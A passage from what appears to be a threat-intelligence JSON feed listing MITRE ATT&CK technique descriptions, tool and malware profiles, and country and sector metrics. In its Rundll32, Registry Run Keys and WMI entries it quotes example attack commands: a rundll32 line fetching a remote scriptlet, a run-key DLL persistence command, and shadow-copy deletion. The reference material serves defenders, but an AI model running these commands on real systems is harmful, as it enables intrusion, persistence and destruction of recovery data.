"Malicious File"}, {"id": "294bbdf8-4134-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.", "created_on": "2020-12-18T13:23:05.000Z", "name": "Match Legitimate Name or Location"}, {"id": "58141130-ae4b-11ea-9477-02d538d9640e", "category": "sector", "description": "", "created_on": "2020-06-14T14:28:41.000Z", "name": "Multi-sector"}, {"id": "c3774e67-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\n\nNative API functions (such as <code>NtCreateProcess</code>) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).", "created_on": "2020-02-26T13:49:09.000Z", "name": "Native API"}, {"id": "90c4ef4a-af5e-4908-9ba5-fb7379e2d5be", "category": "trellix-tool", "description": "NightshadeC2 is a botnet with different capabilities depending on the programming language used. The Python version can delete itself, download and run files, and create a reverse shell. The C version has all the same functions as the Python one but can also take screenshots, record keystrokes, and copy clipboard content.", "created_on": "2025-09-06T00:14:35.000Z", "name": "NightshadeC2"}, {"id": "42174b22-12f9-4f94-995d-66e45f6829e1", "category": "mitre-attack-pattern", "description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)", "created_on": "2021-07-23T16:55:51.000Z", "name": "NTFS File Attributes"}, {"id": "902daf79-7bb0-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.", "created_on": "2021-03-02T23:39:42.000Z", "name": "One-Way Communication"}, {"id": "d2b4cb0b-8128-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)", "created_on": "2021-03-09T22:43:09.000Z", "name": "Parent PID Spoofing"}, {"id": "03a54b3d-aa21-11eb-9477-02d538d9640e", "category": "trellix-tool", "description": "Microsoft's powershell scripting language is available by default from Windows 7 upwards and therefore provides stealth with that environment for launching attacks. Further, powershell has been made open-source and cross-platform with the advent of 'powershell core' in 2016.\r\n\r\nPowerShell provides full access to all Windows services including Microsoft COM (Component Object Model) and Microsoft Windows Management Instrumentation (WMI), while add-ins can easily be imported to include functionality for managing Active Directory, Exchange, etc.\r\n\r\nSome other features that make powershell an interesting choice for attackers include:\r\n - Ability to run code directly in memory with ease\r\n - Flexibility to encode elements of a script in a multitude of ways\r\n - Full access to the Microsoft .Net framework\r\n - Ability to re-create the powershell framework binary using .Net framework dll's.\r\n - Logging and detecting behavior is difficult in older versions\r\n - Availability of a number of quality attack frameworks written in powershell.\r\n\r\nSource: Microsoft", "created_on": "2021-05-01T02:00:33.000Z", "name": "PowerShell"}, {"id": "e95190b8-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)", "created_on": "2020-11-20T22:08:25.000Z", "name": "PowerShell"}, {"id": "c4271b0f-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via `/proc`. ESXi also supports use of the `ps` command, as well as `esxcli system process list`.(Citation: Sygnia ESXi Ransomware 2025)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)", "created_on": "2020-02-26T13:49:10.000Z", "name": "Process Discovery"}, {"id": "d660cca8-5bf7-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020)\n\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.", "created_on": "2021-01-21T14:49:17.000Z", "name": "Python"}, {"id": "a2faebc4-c394-48e6-8748-470c721b5a91", "category": "trellix-tool", "description": "The genuine python.exe file is an essential software component developed by the Python Software Foundation that functions as the primary executable used to launch Python applications. As an adaptable, high-level programming language, Python accommodates multiple coding paradigms, including object-oriented, imperative, functional, and procedural programming styles.", "created_on": "2022-08-05T21:14:35.000Z", "name": "python.exe"}, {"id": "c4b26b01-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", "created_on": "2020-02-26T13:49:11.000Z", "name": "Query Registry"}, {"id": "9cc8ce6a-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: <code>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup</code>. The startup folder path for all users is <code>C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp</code>.\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n\nPrograms listed in the load value of the registry key <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> run automatically for the currently logged-on user.\n\nBy default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "created_on": "2020-11-20T03:00:57.000Z", "name": "Registry Run Keys / Startup Folder"}, {"id": "9307fc52-344a-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>  This behavior has been seen used by malware such as Poweliks.(Citation: This is Security Command Line Confusion)\n\nThreat actors may also abuse legitimate, signed system DLLs (e.g., <code>zipfldr.dll, ieframe.dll</code>) with <code>rundll32.exe</code> to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection.(Citation: lolbas project Zipfldr.dll)(Citation: lolbas project Ieframe.dll)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).\n\nAdditionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) ", "created_on": "2020-12-02T03:00:46.000Z", "name": "Rundll32"}, {"id": "d64738f4-68c4-4dc3-b246-c49ff7fe8ba4", "category": "trellix-tool", "description": "Loads and runs 32-bit dynamic-link libraries (DLLs). There are no configurable settings for Rundll32. Help information is provided for a specific DLL you run with the rundll32 command.\r\n\r\nYou must run the rundll32 command from an elevated command prompt. To open an elevated command prompt, click Start, right-click Command Prompt, and then click Run as administrator. Source: Microsoft", "created_on": "2022-02-10T18:20:25.000Z", "name": "Rundll32"}, {"id": "e90fcf19-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as cloud monitoring agents and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize the [Cloud API](https://attack.mitre.org/techniques/T1059/009) to discover cloud-native security software installed on compute infrastructure, such as the AWS CloudWatch agent, Azure VM Agent, and Google Cloud Monitor agent. These agents  may collect  metrics and logs from the VM, which may be centrally aggregated in a cloud-based monitoring platform.", "created_on": "2020-11-20T22:08:25.000Z", "name": "Security Software Discovery"}, {"id": "c8a66a05-d5d6-42f7-a061-4957d91675fe", "category": "trellix-tool", "description": "SloppyRAT is a sophisticated form of malware engineered with a wide array of capabilities designed to execute administrative functions while evading security detection. It utilizes a vast library of built-in commands reminiscent of PowerShell to perform actions on compromised systems and employs encrypted code blocks to protect its operations from scrutiny. Additionally, the malware leverages a technique known as EtherHiding, which routes command-and-control communications through the Polygon JSON-RPC protocol to hide its network traffic within legitimate blockchain infrastructure. To ensure long-term survival on a host machine, SloppyRAT also incorporates multiple anti-analysis mechanisms that actively thwart attempts by security researchers and automated systems to analyze its behavior.", "created_on": "2026-09-11T00:12:36.000Z", "name": "SloppyRAT"}, {"id": "a7da4e26-1bfc-421d-b772-ea0c85555c36", "category": "trellix-tool", "description": "The start command in Microsoft Windows is used to launch a new instance of a program or open a file with its associated application from the command line or a batch script. It can be used to run programs in a separate window, start scripts, or open files, folders, or URLs in their default applications. The command also allows you to specify window states, such as minimized or maximized, and can run processes in the background.", "created_on": "2024-10-07T21:15:25.000Z", "name": "start"}, {"id": "9ca75d59-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.", "created_on": "2020-11-20T03:00:57.000Z", "name": "Symmetric Cryptography"}, {"id": "c3f17bf6-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from [Local Storage Discovery](https://attack.mitre.org/techniques/T1680) which is an adversary's discovery of local drive, disks and/or volumes.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. Adversaries may leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get` and `system version get`.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)\n\n[System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) ", "created_on": "2020-02-26T13:49:10.000Z", "name": "System Information Discovery"}, {"id": "c452e2d0-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address.(Citation: Trellix Rnasomhouse 2024)\n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ", "created_on": "2020-02-26T13:49:11.000Z", "name": "System Network Configuration Discovery"}, {"id": "c459d94f-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)", "created_on": "2020-02-26T13:49:11.000Z", "name": "System Owner/User Discovery"}, {"id": "c422d23c-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>. Adversaries may also gather information about schedule tasks via commands such as `schtasks` on Windows or `crontab -l` on Linux and macOS.(Citation: Elastic Security Labs GOSAR 2024)(Citation: SentinelLabs macOS Malware 2021)(Citation: Splunk Linux Gormir 2024)(Citation: Aquasec Kinsing 2020)\n\nAdversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", "created_on": "2020-02-26T13:49:10.000Z", "name": "System Service Discovery"}, {"id": "9ce70935-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", "created_on": "2020-11-20T03:00:57.000Z", "name": "Web Protocols"}, {"id": "9cc48241-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.", "created_on": "2020-11-20T03:00:57.000Z", "name": "Windows Command Shell"}, {"id": "c39b5527-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.\n\nThe WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)\n\n**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being \u201cdisabled by default\u201d on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)", "created_on": "2020-02-26T13:49:09.000Z", "name": "Windows Management Instrumentation"}, {"id": "b083e733-86d5-469d-b7e9-66a5273f8e86", "category": "trellix-tool", "description": "WMIC is a legitimate windows command-line utility (Wmic.exe) to access the Windows Management Instrumentation (WMI). Previously, an end user would generally write a script to gather information by means of WMI. Wmic.exe can only be used by the local system administrators regardless of WMI namespace permissions on the local machine\r\n\r\nReference: Microsoft", "created_on": "2021-11-17T21:27:09.000Z", "name": "WMIC"}, {"id": "12bbcf25-d8e6-4729-becc-509ee23be8bd", "category": "trellix-tool", "description": "Zlib is a software library used for data compression and utilizes lossless compression. This is portable across various platforms such as Linux, Windows and Macintosh.\r\n\r\nSource: Zlib.net", "created_on": "2023-03-21T21:11:05.000Z", "name": "Zlib Compression Library"}], "metrics": [{"date": "2026-09-11", "nodes": 0.7, "events": 5.62, "sectors": [{"sector": "Various", "affected": 5.91, "events": 47.28, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 2.41, "events": 19.26, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": 